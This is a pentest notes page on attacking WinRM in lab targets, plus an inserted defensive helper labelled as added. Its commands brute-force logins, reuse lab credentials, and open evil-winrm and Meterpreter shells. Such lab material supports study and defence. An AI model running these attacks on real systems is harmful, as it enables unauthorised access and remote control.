# Port 5985 - WINRM

WinRM (Windows Remote Management) is a Windows-based service that enables administrators to remotely manage and execute commands on Windows machines. It's built on the WS-Management protocol, which is a standard web services protocol used for remote software and hardware management.

Let's check whether the credentials we have give us access over WinRM.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ crackmapexec winrm 10.10.10.161 -u "svc-alfresco" -p "s3rvice"  
SMB         10.10.10.161    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP        10.10.10.161    5985   FOREST           [*] http://10.10.10.161:5985/wsman
WINRM       10.10.10.161    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)
```

The credentials are valid (`Pwn3d!`), so let's get a shell with evil-winrm.

```
┌──(kali㉿kali)-[~/Desktop]
└─$ evil-winrm -i 10.10.10.161 -u "svc-alfresco" -p "s3rvice"

Evil-WinRM shell v3.5

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
```

### WINRM Bruteforcing

```
msfconsole -q
use auxiliary/scanner/winrm/winrm_login
set RHOSTS demo.ine.local
set USER_FILE /usr/share/metasploit-framework/data/wordlists/common_users.txt
set PASS_FILE /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set VERBOSE false
set PASSWORD anything
exploit
```

Note: We set PASSWORD because, in recent versions of the `winrm_login` module, the PASSWORD option is required unless Kerberos authentication is used. Metasploit will still use the USERPASS\_FILE wordlist.

#### Checking the authentication methods WinRM supports

Before connecting to the WinRM service, we need to know which authentication methods it accepts, since the client must use one the server allows. Microsoft documents the available methods here: <https://docs.microsoft.com/en-us/windows/win32/winrm/authentication-for-remote-connections>

**Commands:**

```
use auxiliary/scanner/winrm/winrm_auth_methods
set RHOSTS demo.ine.local
exploit
```

The target supports two authentication types: Basic and Negotiate.
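The kind of check the `winrm_auth_methods` module performs, written as a small audit helper. This is an added example, not code from the page or from Metasploit: it parses the `WWW-Authenticate` headers in the 401 a WinRM listener returns to an unauthenticated request and flags Basic authentication on the plaintext port 5985. The HTTP response is a constructed sample and the function names are my own.

```python
from typing import Dict, List

# Constructed sample: the HTTP 401 a WinRM listener returns to an
# unauthenticated POST to /wsman. Each WWW-Authenticate header names
# one scheme the service will accept.
SAMPLE_401 = (
    "HTTP/1.1 401 \r\n"
    "Server: Microsoft-HTTPAPI/2.0\r\n"
    "WWW-Authenticate: Negotiate\r\n"
    'WWW-Authenticate: Basic realm="WSMAN"\r\n'
    "Content-Length: 0\r\n"
    "\r\n"
)

# Schemes WinRM can advertise; used to normalise header casing.
KNOWN_SCHEMES = ("Basic", "Negotiate", "Kerberos", "CredSSP")


def parse_auth_methods(raw_response: str) -> List[str]:
    """Schemes listed in WWW-Authenticate headers, server order, no duplicates."""
    head = raw_response.split("\r\n\r\n", 1)[0]
    methods: List[str] = []
    for line in head.split("\r\n")[1:]:          # skip the status line
        name, sep, value = line.partition(":")
        if not sep or name.strip().lower() != "www-authenticate":
            continue
        scheme = value.strip().split(" ", 1)[0]  # drop realm="..." etc.
        scheme = next((k for k in KNOWN_SCHEMES
                       if k.lower() == scheme.lower()), scheme)
        if scheme and scheme not in methods:
            methods.append(scheme)
    return methods


def audit_auth_methods(methods: List[str], port: int) -> Dict[str, str]:
    """One risk note per weak finding. Port 5985 is the plaintext HTTP
    listener; only Negotiate/Kerberos/CredSSP add message-level encryption
    on top of it, Basic does not."""
    findings: Dict[str, str] = {}
    if "Basic" in methods:
        if port == 5985:
            findings["Basic"] = ("Basic auth over HTTP: credentials are only "
                                 "base64-encoded and the session is not "
                                 "encrypted; disable Basic or use 5986/HTTPS.")
        else:
            findings["Basic"] = ("Basic auth enabled: acceptable only with "
                                 "TLS; prefer Negotiate/Kerberos.")
    return findings
```

Running `parse_auth_methods(SAMPLE_401)` returns `['Negotiate', 'Basic']`, matching the two methods the module reported above, and `audit_auth_methods` on that list for port 5985 flags the Basic finding.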

#### Executing a command on the target with the winrm\_cmd module

**Commands:**

```
use auxiliary/scanner/winrm/winrm_cmd
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set CMD whoami
exploit
```

We have successfully executed the command `whoami` on the remote server.

#### winrm\_script\_exec exploit module

Now we will use the winrm\_script\_exec exploit module to get a Meterpreter shell.

**Commands:**

```
use exploit/windows/winrm/winrm_script_exec
set RHOSTS demo.ine.local
set USERNAME administrator
set PASSWORD tinkerbell
set FORCE_VBS true
exploit
```

We now have a Meterpreter session.
